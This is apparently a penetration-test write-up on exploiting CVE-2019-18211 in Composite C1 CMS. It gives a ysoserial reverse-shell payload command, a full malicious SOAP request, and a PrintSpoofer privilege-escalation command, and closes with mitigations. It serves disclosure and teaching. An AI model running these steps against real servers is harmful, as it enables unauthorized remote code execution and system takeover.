.NET Deserialization Leading to Remote Code Execution in Composite C1 CMS – CVE-2019-18211

Introduction

This post demonstrates the black-box exploitation of Composite C1 CMS leveraging the deserialization vulnerability tracked as CVE-2019-18211. The flaw exists in specific SOAP-based web services within the CMS and allows attackers to execute arbitrary code on the target server. This vulnerability allows any user with low-level privileges (e.g., Editor) to remotely execute code (RCE).

The attack was performed without source code access, relying solely on external enumeration, service discovery, and payload delivery techniques.

Discovering the CMS Administration Panel

A directory scan revealed that the CMS administrative interface was exposed at the following path:

/Composite

Version Identification

After accessing the panel, the CMS version was identified through the "?" → About C1 Composite menu.

Example version string obtained during testing:

Composite C1
Build no. 5.0.5827.21806

This version is known to be vulnerable to CVE-2019-18211.

Locating SOAP Services

Using Burp Suite during navigation, a WSDL file was discovered:

GET /Composite/services/Tree/TreeServices.asmx?WSDL

This WSDL file was then parsed using a WSDL parsing extension in Burp to enumerate available methods and parameters.

Target Method: GetMultipleChildren

Analysis of the WSDL output revealed the GetMultipleChildren method within the TreeServiceFacade.

This method accepts an EntityToken parameter, which is handled by the EntityTokenSerializer class in Composite.dll.
The vulnerability exists because this class performs unvalidated deserialization of wrapped BinaryFormatter payloads, allowing arbitrary code execution on the server.

Generating a Malicious Payload

The vulnerable code uses BinaryFormatter via Microsoft.Practices.EnterpriseLibrary.Logging.Formatters.BinaryLogFormatter.
To exploit this, a malicious payload was generated using ysoserial.

First, a PowerShell reverse shell command was prepared and Base64-encoded. Then, ysoserial was used:

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "powershell -e <Base64-Encoded-Payload>" -o base64

Crafting the SOAP Request

The payload was embedded into the EntityToken parameter. The request structure was modified as follows:

<man:EntityToken>
entityTokenType='Microsoft.Practices.EnterpriseLibrary.Logging.Formatters.BinaryLogFormatter'
entityToken='<Base64-Payload>'
</man:EntityToken>

A complete SOAP request example:

POST /Composite/services/Tree/TreeServices.asmx HTTP/1.1
Host: targetsite.com
SOAPAction: "http://www.composite.net/ns/management/GetMultipleChildren"
Content-Type: text/xml;charset=UTF-8

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:man="http://www.composite.net/ns/management">
   <soap:Header/>
   <soap:Body>
      <man:GetMultipleChildren>
         <man:clientProviderNameEntityTokenPairs>
            <man:RefreshChildrenParams>
               <man:ProviderName>test</man:ProviderName>
               <man:EntityToken>entityTokenType='Microsoft.Practices.EnterpriseLibrary.Logging.Formatters.BinaryLogFormatter' entityToken='<Base64-Payload>'</man:EntityToken>
            </man:RefreshChildrenParams>
         </man:clientProviderNameEntityTokenPairs>
      </man:GetMultipleChildren>
   </soap:Body>
</soap:Envelope>

Remote Code Execution

Once the SOAP request was sent to the vulnerable endpoint, the malicious payload was deserialized by the server, resulting in successful remote code execution and a reverse shell connection.

Privilege Escalation (Bonus)

Post-exploitation enumeration revealed SeImpersonatePrivilege enabled on the compromised host.

This allowed privilege escalation to SYSTEM using PrintSpoofer:

PrintSpoofer64.exe -c "powershell -nop -w hidden -e <Base64-Encoded-Shell>"

Conclusion

This assessment demonstrates how Composite C1 CMS installations running vulnerable versions are susceptible to CVE-2019-18211, allowing attackers to achieve remote code execution via insecure deserialization in SOAP services.

Mitigation Recommendations:

    Upgrade to the latest version of C1 CMS.

    Restrict access to /Composite and its SOAP endpoints.

    Disable or secure WSDL file access in production environments.

    Implement safe serialization practices and avoid BinaryFormatter where possible.

References

^{https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2019-18211}

^{https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7}

^{https://github.com/pwntester/ysoserial.net}